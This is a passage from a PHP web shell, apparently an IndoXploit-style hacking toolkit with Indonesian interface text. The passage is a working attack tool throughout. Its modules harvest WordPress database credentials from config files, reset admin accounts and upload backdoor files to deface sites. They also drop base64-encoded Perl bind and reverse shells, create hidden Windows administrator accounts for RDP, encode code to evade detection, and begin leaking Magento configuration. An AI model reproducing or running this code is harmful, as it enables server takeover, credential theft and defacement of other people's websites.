2908. echo "<iframe src='priv_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
2909. } elseif($_GET['do'] == 'fake_root') {
2910. ob_start();
2911. $cwd = getcwd();
2912. $ambil_user = explode("/", $cwd);
2913. $user = $ambil_user[2];
2914. if($_POST['reverse']) {
2915. $site = explode("\r\n", $_POST['url']);
2916. $file = $_POST['file'];
2917. foreach($site as $url) {
2918. $cek = getsource("$url/~$user/$file");
2919. if(preg_match("/hacked/i", $cek)) {
2920. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
2921. }
2922. }
2923. } else {
2924. echo "<center><form method='post'>
2925. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
2926. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
2927. Domain: <br>
2928. <textarea style='width: 450px; height: 250px;' name='url'>";
2929. reverse($_SERVER['HTTP_HOST']);
2930. echo "</textarea><br>
2931. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
2932. </form><br>
2933. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
2934. }
2935. } elseif($_GET['do'] == 'adminer') {
2936. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2937. function adminer($url, $isi) {
2938. $fp = fopen($isi, "w");
2939. $ch = curl_init();
2940. curl_setopt($ch, CURLOPT_URL, $url);
2941. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2942. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2943. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2944. curl_setopt($ch, CURLOPT_FILE, $fp);
2945. return curl_exec($ch);
2946. curl_close($ch);
2947. fclose($fp);
2948. ob_flush();
2949. flush();
2950. }
2951. if(file_exists('adminer.php')) {
2952. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2953. } else {
2954. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
2955. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2956. } else {
2957. echo "<center><font color=red>gagal buat file adminer</font></center>";
2958. }
2959. }
2960. } elseif($_GET['do'] == 'auto_dwp') {
2961. if($_POST['auto_deface_wp']) {
2962. function anucurl($sites) {
2963. $ch = curl_init($sites);
2964. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2965. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2966. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2967. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2968. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2969. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2970. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2971. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2972. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2973. $data = curl_exec($ch);
2974. curl_close($ch);
2975. return $data;
2976. }
2977. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2978. $post = array(
2979. "log" => "$userr",
2980. "pwd" => "$pass",
2981. "rememberme" => "forever",
2982. "wp-submit" => "$wp_submit",
2983. "redirect_to" => "$web",
2984. "testcookie" => "1",
2985. );
2986. $ch = curl_init($cek);
2987. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2988. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2989. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2990. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2991. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2992. curl_setopt($ch, CURLOPT_POST, 1);
2993. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2994. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2995. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2996. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2997. $data = curl_exec($ch);
2998. curl_close($ch);
2999. return $data;
3000. }
3001. $scan = $_POST['link_config'];
3002. $link_config = scandir($scan);
3003. $script = htmlspecialchars($_POST['script']);
3004. $user = "pr!v@t3";
3005. $pass = "pr!v@t3";
3006. $passx = md5($pass);
3007. foreach($link_config as $dir_config) {
3008. if(!is_file("$scan/$dir_config")) continue;
3009. $config = file_get_contents("$scan/$dir_config");
3010. if(preg_match("/WordPress/", $config)) {
3011. $dbhost = ambilkata($config,"DB_HOST', '","'");
3012. $dbuser = ambilkata($config,"DB_USER', '","'");
3013. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3014. $dbname = ambilkata($config,"DB_NAME', '","'");
3015. $dbprefix = ambilkata($config,"table_prefix = '","'");
3016. $prefix = $dbprefix."users";
3017. $option = $dbprefix."options";
3018. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3019. $db = mysql_select_db($dbname);
3020. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3021. $result = mysql_fetch_array($q);
3022. $id = $result[ID];
3023. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3024. $result2 = mysql_fetch_array($q2);
3025. $target = $result2[option_value];
3026. if($target == '') {
3027. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
3028. } else {
3029. echo "[+] $target <br>";
3030. }
3031. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3032. if(!$conn OR !$db OR !$update) {
3033. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
3034. mysql_close($conn);
3035. } else {
3036. $site = "$target/wp-login.php";
3037. $site2 = "$target/wp-admin/theme-install.php?upload";
3038. $b1 = anucurl($site2);
3039. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3040. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3041. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3042. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3043. $www = "m.php";
3044. $fp5 = fopen($www,"w");
3045. fputs($fp5,$upload3);
3046. $post2 = array(
3047. "_wpnonce" => "$anu2",
3048. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3049. "themezip" => "@$www",
3050. "install-theme-submit" => "Install Now",
3051. );
3052. $ch = curl_init("$target/wp-admin/update.php?bom&action=upload-theme");
3053. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3054. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3055. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3056. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3057. curl_setopt($ch, CURLOPT_POST, 1);
3058. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3059. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3060. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3061. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3062. $data3 = curl_exec($ch);
3063. curl_close($ch);
3064. $y = date("Y");
3065. $m = date("m");
3066. $namafile = "id.php";
3067. $fpi = fopen($namafile,"w");
3068. fputs($fpi,$script);
3069. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3070. curl_setopt($ch6, CURLOPT_POST, true);
3071. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3072. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3073. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3074. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3075. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
3076. $postResult = curl_exec($ch6);
3077. curl_close($ch6);
3078. $as = "$target/k.php";
3079. $bs = anucurl($as);
3080. if(preg_match("#$script#is", $bs)) {
3081. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
3082. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3083. } else {
3084. echo "[-] <font color='red'>gagal mepes...</font><br>";
3085. echo "[!!] coba aja manual: <br>";
3086. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3087. echo "[+] username: <font color=lime>$user</font><br>";
3088. echo "[+] password: <font color=lime>$pass</font><br><br>";
3089. }
3090. mysql_close($conn);
3091. }
3092. }
3093. }
3094. } else {
3095. echo "<center><h1>WordPress Auto Deface</h1>
3096. <form method='post'>
3097. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
3098. <input type='text' name='script' height='10' size='50' placeholder='Hacked by pr!v@t3' required><br>
3099. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3100. </form>
3101. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
3102. </center>";
3103. }
3104. } elseif($_GET['do'] == 'auto_dwp2') {
3105. if($_POST['auto_deface_wp']) {
3106. function anucurl($sites) {
3107. $ch = curl_init($sites);
3108. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3109. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3110. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3111. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3112. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3113. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3114. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3115. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3116. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
3117. $data = curl_exec($ch);
3118. curl_close($ch);
3119. return $data;
3120. }
3121. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
3122. $post = array(
3123. "log" => "$userr",
3124. "pwd" => "$pass",
3125. "rememberme" => "forever",
3126. "wp-submit" => "$wp_submit",
3127. "redirect_to" => "$web",
3128. "testcookie" => "1",
3129. );
3130. $ch = curl_init($cek);
3131. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3132. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3133. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3134. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3135. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3136. curl_setopt($ch, CURLOPT_POST, 1);
3137. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
3138. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3139. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3140. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3141. $data = curl_exec($ch);
3142. curl_close($ch);
3143. return $data;
3144. }
3145. $link = explode("\r\n", $_POST['link']);
3146. $script = htmlspecialchars($_POST['script']);
3147. $user = "pr!v@t3";
3148. $pass = "pr!v@t3";
3149. $passx = md5($pass);
3150. foreach($link as $dir_config) {
3151. $config = anucurl($dir_config);
3152. $dbhost = ambilkata($config,"DB_HOST', '","'");
3153. $dbuser = ambilkata($config,"DB_USER', '","'");
3154. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3155. $dbname = ambilkata($config,"DB_NAME', '","'");
3156. $dbprefix = ambilkata($config,"table_prefix = '","'");
3157. $prefix = $dbprefix."users";
3158. $option = $dbprefix."options";
3159. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3160. $db = mysql_select_db($dbname);
3161. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3162. $result = mysql_fetch_array($q);
3163. $id = $result[ID];
3164. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3165. $result2 = mysql_fetch_array($q2);
3166. $target = $result2[option_value];
3167. if($target == '') {
3168. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
3169. } else {
3170. echo "[+] $target <br>";
3171. }
3172. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3173. if(!$conn OR !$db OR !$update) {
3174. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
3175. mysql_close($conn);
3176. } else {
3177. $site = "$target/wp-login.php";
3178. $site2 = "$target/wp-admin/theme-install.php?upload";
3179. $b1 = anucurl($site2);
3180. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3181. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3182. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3183. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3184. $www = "m.php";
3185. $fp5 = fopen($www,"w");
3186. fputs($fp5,$upload3);
3187. $post2 = array(
3188. "_wpnonce" => "$anu2",
3189. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3190. "themezip" => "@$www",
3191. "install-theme-submit" => "Install Now",
3192. );
3193. $ch = curl_init("$target/wp-admin/update.php?bom&action=upload-theme");
3194. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3195. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3196. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3197. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3198. curl_setopt($ch, CURLOPT_POST, 1);
3199. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3200. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3201. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3202. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3203. $data3 = curl_exec($ch);
3204. curl_close($ch);
3205. $y = date("Y");
3206. $m = date("m");
3207. $namafile = "id.php";
3208. $fpi = fopen($namafile,"w");
3209. fputs($fpi,$script);
3210. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3211. curl_setopt($ch6, CURLOPT_POST, true);
3212. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3213. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3214. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3215. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3216. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
3217. $postResult = curl_exec($ch6);
3218. curl_close($ch6);
3219. $as = "$target/k.php";
3220. $bs = anucurl($as);
3221. if(preg_match("#$script#is", $bs)) {
3222. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
3223. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3224. } else {
3225. echo "[-] <font color='red'>gagal mepes...</font><br>";
3226. echo "[!!] coba aja manual: <br>";
3227. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3228. echo "[+] username: <font color=lime>$user</font><br>";
3229. echo "[+] password: <font color=lime>$pass</font><br><br>";
3230. }
3231. mysql_close($conn);
3232. }
3233. }
3234. } else {
3235. echo "<center><h1>WordPress Auto Deface V.2</h1>
3236. <form method='post'>
3237. Link Config: <br>
3238. <textarea name='link' placeholder='http://target.com/priv_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
3239. <input type='text' name='script' height='10' size='50' placeholder='Hacked by pr!v@t3' required><br>
3240. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3241. </form></center>";
3242. }
3243. } elseif($_GET['do'] == 'network') {
3244. echo "<form method='post'>
3245. <u>Bind Port:</u> <br>
3246. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
3247. <input type='submit' name='sub_bp' value='>>'>
3248. </form>
3249. <form method='post'>
3250. <u>Back Connect:</u> <br>
3251. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
3252. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
3253. <input type='submit' name='sub_bc' value='>>'>
3254. </form>";
3255. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
3256. if(isset($_POST['sub_bp'])) {
3257. $f_bp = fopen("/tmp/bp.pl", "w");
3258. fwrite($f_bp, base64_decode($bind_port_p));
3259. fclose($f_bp);
3260.  
3261. $port = $_POST['port_bind'];
3262. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
3263. sleep(1);
3264. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
3265. unlink("/tmp/bp.pl");
3266. }
3267. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
3268. if(isset($_POST['sub_bc'])) {
3269. $f_bc = fopen("/tmp/bc.pl", "w");
3270. fwrite($f_bc, base64_decode($bind_connect_p));
3271. fclose($f_bc);
3272.  
3273. $ipbc = $_POST['ip_bc'];
3274. $port = $_POST['port_bc'];
3275. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
3276. sleep(1);
3277. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
3278. unlink("/tmp/bc.pl");
3279. }
3280. }elseif($_GET['do'] == 'hash')
3281. {
3282. $submit= $_POST['enter'];
3283. if (isset($submit)) {
3284. $pass = $_POST['password']; // password
3285. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
3286. $hash = md5($pass); // md5 hash #1
3287. $md4 = hash("md4",$pass);
3288. $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
3289. $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
3290. $hash1 = sha1($pass); // sha1 hash #4
3291. $sha256 = hash("sha256",$text);
3292. $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
3293. $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
3294. $base64_encode = base64_encode($pass); // Base64 Encode
3295. }
3296. echo '
3297. <table align="center">
3298. <tr><td><center><h1>Password Hash</h1></center><br><br></td></tr>
3299. <form action="" method="post">
3300. <tr><td><strong>Masukan kata yang ingin di encrypt : </strong> <input type="text" name="password" size="40" />&nbsp</td></tr>
3301. <tr><td><input type="submit" name="enter" value="hash"/> <br><br></td></tr>
3302. <tr><td><h1>Hasil Hash </h1></td></tr>
3303. <tr><td><p>Original Password : <input type=text size=50 value='.$pass.'></p></td></tr>
3304. <tr><td><p>MD5 : <input type=text size=50 value='.$hash.'></p></td></tr>
3305. <tr><td><p>Base64 Encode : <input type=text size=50 value='.$base64_encode.'></p></td></tr>
3306. <tr><td><p>MD4 : <input type=text size=50 value='.$md4.'></p></td></tr>
3307. <tr><td><p>MD5 with Salt : <input type=text size=50 value='.$hash_md5.'></p></td></tr>
3308. <tr><td><p>MD5 with Salt & Sha1 : <input type=text size=50 value='.$hash_md5_double.'></p></td></tr>
3309. <tr><td><p>Sha1 : <input type=text size=50 value='.$hash1.'></p></td></tr>
3310. <tr><td><p>Sha256 : <input type=text size=50 value='.$sha256.'></p></td></tr>
3311. <tr><td><p>Sha1 with Salt : <input type=text size=50 value='.$hash1_sha1.'></p></td></tr>
3312. <tr><td><p>Sha1 with Salt & MD5 : <input type=text size=50 value='.$hash1_sha1_double.'></p></td></tr>
3313. </table>';
3314. }elseif($_GET['do'] == 'string') {
3315. $text = $_POST['code'];
3316. ?><center><br><b>-=[ S c r i p t E n d c o d e]=-</b><br>
3317. <form method="post"><br>
3318. <textarea name="code"></textarea><br>
3319. <select size="1" name="ope">
3320. <option value="urlencode">url</option>
3321. <option value="base64">Base64</option>
3322. <option value="ur">convert_uu</option>
3323. <option value="gzinflates">gzinflate - base64</option>
3324. <option value="jancok">str_rot13 - base64_dcode</option>
3325. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
3326. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
3327. <option value="Pelo">gzinflate - str_rot13 - base64_decode</option>
3328. <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
3329. </select>&nbsp;<input type='submit' name='submit' value='Encode'>
3330. </form>
3331.  
3332. <?php
3333. $submit = $_POST['submit'];
3334. if (isset($submit)) {
3335. $op = $_POST["ope"];
3336. switch ($op) {
3337. case 'base64':
3338. $codi = base64_encode($text);
3339. break;
3340. case 'str':
3341. $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
3342. break;
3343. case 'gzinflate':
3344. $codi = base64_encode(gzdeflate(str_rot13($text)));
3345. break;
3346. case 'jancok':
3347. $codi = base64_encode(str_rot13($text));
3348. break;
3349. case 'gzinflates':
3350. $codi = base64_encode(gzdeflate($text));
3351. break;
3352. case 'str2':
3353. $codi = base64_encode(str_rot13($text));
3354. break;
3355. case 'urlencode':
3356. $codi = rawurlencode($text);
3357. break;
3358. case 'Pelo':
3359. $codi = base64_encode(str_rot13(gzdeflate($text)));
3360. break;
3361. case 'ur':
3362. $codi = convert_uuencode($text);
3363. break;
3364. case 'url':
3365. $codi = base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
3366. break;
3367. default:
3368. break;
3369. }
3370. }
3371. echo '<textarea readonly>' . $codi . '</textarea></center>';
3372.  
3373.  
3374. }elseif($_GET['do'] == 'rdp') {
3375. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
3376. if($_POST['create']) {
3377. $user = htmlspecialchars($_POST['user']);
3378. $pass = htmlspecialchars($_POST['pass']);
3379. if(preg_match("/$user/", exe("net user"))) {
3380. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Sudah Ada</font>";
3381. } else {
3382. $add_user = exe("net user $user $pass /add");
3383. $add_groups1 = exe("net localgroup Administrators $user /add");
3384. $add_groups2 = exe("net localgroup Administrator $user /add");
3385. $add_groups3 = exe("net localgroup Administrateur $user /add");
3386. echo "[ RDP ACCOUNT INFO ]<br>
3387. ------------------------------<br>
3388. IP: <font color=lime>".$ip."</font><br>
3389. Username: <font color=lime>$user</font><br>
3390. Password: <font color=lime>$pass</font><br>
3391. ------------------------------<br><br>
3392. [ STATUS ]<br>
3393. ------------------------------<br>
3394. ";
3395. if($add_user) {
3396. echo "[add user] -> <font color='lime'>Berhasil Ndan</font><br>";
3397. } else {
3398. echo "[add user] -> <font color='red'>Gagal Ndan</font><br>";
3399. }
3400. if($add_groups1) {
3401. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
3402. } elseif($add_groups2) {
3403. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
3404. } elseif($add_groups3) {
3405. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
3406. } else {
3407. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
3408. }
3409. echo "------------------------------<br>";
3410. }
3411. } elseif($_POST['s_opsi']) {
3412. $user = htmlspecialchars($_POST['r_user']);
3413. if($_POST['opsi'] == '1') {
3414. $cek = exe("net user $user");
3415. echo "Checking username <font color=lime>$user</font> ....... ";
3416. if(preg_match("/$user/", $cek)) {
3417. echo "[ <font color=lime>Sudah ada</font> ]<br>
3418. ------------------------------<br><br>
3419. <pre>$cek</pre>";
3420. } else {
3421. echo "[ <font color=red>Belum ada</font> ]";
3422. }
3423. } elseif($_POST['opsi'] == '2') {
3424. $cek = exe("net user $user indoxploit");
3425. if(preg_match("/$user/", exe("net user"))) {
3426. echo "[change password: <font color=lime>pr!v@t3</font>] -> ";
3427. if($cek) {
3428. echo "<font color=lime>Berhasil</font>";
3429. } else {
3430. echo "<font color=red>Gagal</font>";
3431. }
3432. } else {
3433. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Belum ada</font>";
3434. }
3435. } elseif($_POST['opsi'] == '3') {
3436. $cek = exe("net user $user /DELETE");
3437. if(preg_match("/$user/", exe("net user"))) {
3438. echo "[remove user: <font color=lime>$user</font>] -> ";
3439. if($cek) {
3440. echo "<font color=lime>Berhasil</font>";
3441. } else {
3442. echo "<font color=red>Gagal</font>";
3443. }
3444. } else {
3445. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Belum ada</font>";
3446. }
3447. } else {
3448. //
3449. }
3450. } else {
3451. echo "-- Create RDP --<br>
3452. <form method='post'>
3453. <input type='text' name='user' placeholder='username' value='pr!v@t3' required>
3454. <input type='text' name='pass' placeholder='password' value='pr!v@t3' required>
3455. <input type='submit' name='create' value='>>'>
3456. </form>
3457. -- Option --<br>
3458. <form method='post'>
3459. <input type='text' name='r_user' placeholder='username' required>
3460. <select name='opsi'>
3461. <option value='1'>Cek Username</option>
3462. <option value='2'>Ubah Password</option>
3463. <option value='3'>Hapus Username</option>
3464. </select>
3465. <input type='submit' name='s_opsi' value='>>'>
3466. </form>
3467. ";
3468. }
3469. } else {
3470. echo "<font color=red>Bukan Windows Ndan -_-.</font>";
3471. }
3472. }elseif ($_GET['do'] == 'magento'){
3473. echo '
3474. <Center><h2 a>SC Leaking Magento</h2 a>
3475. <form action="" method="post">
3476. <input type="text" value="'.$dir.'/app/etc/local.xml" name="shcpatch" placeholder="http://localhost/" class="boxtitle">
3477. <select class="boxtitle" name="cms">
3478. <option>Magento</option>
3479. </select>
3480. <input class="boxtitle" type="submit" name="submit" value="Scan Now!"/>
3481. </form>
3482. </Center>';
3483. error_reporting(0);
3484. class shc
3485. {
3486. public function drop(){
3487. unlink(basename($_SERVER['PHP_SELF']));
3488. }
3489. public function get($location){
